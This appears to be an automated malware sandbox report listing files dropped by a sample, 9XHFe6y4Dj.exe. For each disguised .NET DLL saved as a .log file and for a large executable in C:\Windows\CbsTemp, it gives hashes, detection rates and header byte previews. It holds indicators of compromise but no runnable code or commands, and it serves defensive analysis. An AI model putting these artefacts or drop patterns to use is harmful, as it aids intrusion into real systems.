                                                          SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                          SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                          SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 29%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\ftgCpYKW.log

                                                          Download File
                                                          Process:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):23552
                                                          Entropy (8bit):5.519109060441589
                                                          Encrypted:false
                                                          SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                          MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                          SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                          SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                          SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\ioFvQtnJ.log

                                                          Download File
                                                          Process:C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):38400
                                                          Entropy (8bit):5.699005826018714
                                                          Encrypted:false
                                                          SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                          MD5:87765D141228784AE91334BAE25AD743
                                                          SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                          SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                          SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 9%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\jrGLbElV.log

                                                          Download File
                                                          Process:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):34304
                                                          Entropy (8bit):5.618776214605176
                                                          Encrypted:false
                                                          SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                          MD5:9B25959D6CD6097C0EF36D2496876249
                                                          SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                          SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                          SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\koiTwEAQ.log

                                                          Download File
                                                          Process:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):342528
                                                          Entropy (8bit):6.170134230759619
                                                          Encrypted:false
                                                          SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                          MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                          SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                          SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                          SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 50%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\mcmciRwO.log

                                                          Download File
                                                          Process:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):40448
                                                          Entropy (8bit):5.7028690200758465
                                                          Encrypted:false
                                                          SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                          MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                          SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                          SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                          SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 12%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\oXLUJmZB.log

                                                          Download File
                                                          Process:C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):38912
                                                          Entropy (8bit):5.679286635687991
                                                          Encrypted:false
                                                          SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                          MD5:9E910782CA3E88B3F87826609A21A54E
                                                          SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                          SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                          SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\ohiUtZsx.log

                                                          Download File
                                                          Process:C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):50176
                                                          Entropy (8bit):5.723168999026349
                                                          Encrypted:false
                                                          SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                          MD5:2E116FC64103D0F0CF47890FD571561E
                                                          SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                          SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                          SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 21%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\pSWUxCdp.log

                                                          Download File
                                                          Process:C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):23552
                                                          Entropy (8bit):5.519109060441589
                                                          Encrypted:false
                                                          SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                          MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                          SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                          SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                          SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\pkjlEjqK.log

                                                          Download File
                                                          Process:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):46592
                                                          Entropy (8bit):5.870612048031897
                                                          Encrypted:false
                                                          SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                          MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                          SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                          SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                          SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 5%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\qhLtZjFE.log

                                                          Download File
                                                          Process:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):70144
                                                          Entropy (8bit):5.909536568846014
                                                          Encrypted:false
                                                          SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                          MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                          SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                          SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                          SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 21%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\taabLgrD.log

                                                          Download File
                                                          Process:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):38400
                                                          Entropy (8bit):5.699005826018714
                                                          Encrypted:false
                                                          SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                          MD5:87765D141228784AE91334BAE25AD743
                                                          SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                          SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                          SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 9%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\vWmBrFMh.log

                                                          Download File
                                                          Process:C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):41472
                                                          Entropy (8bit):5.6808219961645605
                                                          Encrypted:false
                                                          SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                          MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                          SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                          SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                          SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\vcMKgPvy.log

                                                          Download File
                                                          Process:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):39936
                                                          Entropy (8bit):5.660491370279985
                                                          Encrypted:false
                                                          SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                          MD5:240E98D38E0B679F055470167D247022
                                                          SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                          SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                          SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\wQQSSdrw.log

                                                          Download File
                                                          Process:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):85504
                                                          Entropy (8bit):5.8769270258874755
                                                          Encrypted:false
                                                          SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                          MD5:E9CE850DB4350471A62CC24ACB83E859
                                                          SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                          SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                          SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 71%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                          C:\Users\user\Desktop\xYZkNoRc.log

                                                          Download File
                                                          Process:C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):33280
                                                          Entropy (8bit):5.634433516692816
                                                          Encrypted:false
                                                          SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                          MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                          SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                          SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                          SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 12%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\yHSRySXa.log

                                                          Download File
                                                          Process:C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):46592
                                                          Entropy (8bit):5.870612048031897
                                                          Encrypted:false
                                                          SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                          MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                          SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                          SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                          SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 5%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\zKTiJdVm.log

                                                          Download File
                                                          Process:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):33792
                                                          Entropy (8bit):5.541771649974822
                                                          Encrypted:false
                                                          SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                          MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                          SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                          SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                          SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 29%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Windows\CbsTemp\bd46efcfcb9ccc

                                                          Download File
                                                          Process:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          File Type:ASCII text, with very long lines (744), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):744
                                                          Entropy (8bit):5.893315213761689
                                                          Encrypted:false
                                                          SSDEEP:12:V0WPMDLoYXMdbamihkfpbSdPeGNo8ai24WbKuUyivYH/ZsRhQwivpy:V0WPMDjWaMQeGN0pee/GzQhy
                                                          MD5:B0A7973D324F38441BF47C66F4A939E1
                                                          SHA1:E9B25EF779F22429B9D90BA0DB530EF2419E1068
                                                          SHA-256:2F51C249B5DC05B879AC9102AB9C1535F0C3EE319D51BDF70D50BA3C0D7687C4
                                                          SHA-512:A9CF28495940D37D1EC5B36A209F1D4C3EF095EFEAEE60BD1B310620A8A2A1DD19C21AEF531196CBDA8DB7E7CABAC40F40D5C8FD48591CCFD475BA47CEB921BC
                                                          Malicious:false
                                                          Preview:WOQNg27Ntt4Gv7B9tARAm0ewJYVWB1LEcVa6VWtBBXFVggLdA9Fjz5HgteEIhlL2hznZhFoXRP9PuIPnM1WCvlPhN4M0SkeaLNxr2v65VsSj52vlOa5pOJG6kGLm2xEqvjDhUivb5bqDSplVIll2pzLCH1GvjTCinmyWzNQqpduxcCn5f0eQLMB5YAadb92mYIaq0Og4U5MLFXjENKQszwXal37yxxOqkIZUl7EQTj5P9z0BbVPQsJwlv9E7RsHhqgk77PcQF9YP0HbwC6Wbh77aVyim2H9lcXjcO3DL29KsuhuoiS5UVpAsjJmJq0X8Axxch8hI2LjhwOpxD4EjMoPwX02ER4eCmMs7tRGjuwcKGd5VeyFwwxvWhAFrFd17qg5kgsDvxfzaLFq34hkczsQyaVZtMZdR4fejiVzvuU8Q8VKcULwi3YI7QGJKSUjYBhfqkHVjsyset90EK6ZAm4YgWhSbLocavjOb0e2N0N0EqnNRQEAW4iwHJ8TDy3XDWRtKuZOqEMKYET0tTBLHoGfMxHR2KyY60wsY4Dg00TRsYXCzIktwrPZPwgWmHVgPxOiSlbzQfUQUywyZFcujFmOkXcmXq3texC5KzuNqvdRX9Ea9s6hol6KK974Izbjllvhw1okUOEylV1lSCnptWE311uK2zF0T4pvNgnHDWNahIjzIWlGLwzPg2q5HdsfJNerpFXwYflXIoVtS4CgN9phEaPV0sAjosRUn1JC8

                                                          C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe

                                                          Download File
                                                          Process:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):16272384
                                                          Entropy (8bit):2.4574169294943817
                                                          Encrypted:false
                                                          SSDEEP:49152:cf9n4cwMfZuNsd9GCdIL6u199WXmQzA8Gqgfe4Nx7eODbUZIYqXNkp9IW8h:cf54mfdQCQx19xQzJScObKp9M
                                                          MD5:8213A9C837181823A4D58728637EAEB5
                                                          SHA1:F574EEC251D1695589C1E0E00AE167DFB39216EC
                                                          SHA-256:68129B517BC27AE2AD742008A7DEB67CC9C85209665F73C8FEA955C52F1EF33E
                                                          SHA-512:4B642F9D9B0F86CB83D2B7371BAF00AFEC1A1475BE85CCFAE08794CB6978B6BE2999BCAF6195351BCD446956F7639F71999FF182F932E3A0D66D935C5E832DAC
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 66%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.................t8.........n.8.. ....8...@.. ........................8...........@................................. .8.K.....8. .....................8...................................................... ............... ..H............text...ts8.. ...t8................. ..`.rsrc... .....8......v8.............@....reloc........8......z8.............@..B................P.8.....H............................-...8......................................0..........(.... ........8........E........)...N...M...8....(.... ....~....{....9....& ....8....(.... ....~....{e...9....& ....8....*(.... ....~....{{...9....& ....8y......0.......... ........8........E............E...q... .......8....r...ps....z*8.... ....8.......... ....~....{....:....& ....8........~....(`...~....(d... ....?.... ....8r...~....(X... .... .... ....s....~....(\....... ....~....{....92...

                                                          C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe:Zone.Identifier

                                                          Download File
                                                          Process:C:\Users\user\Desktop\9XHFe6y4Dj.exe
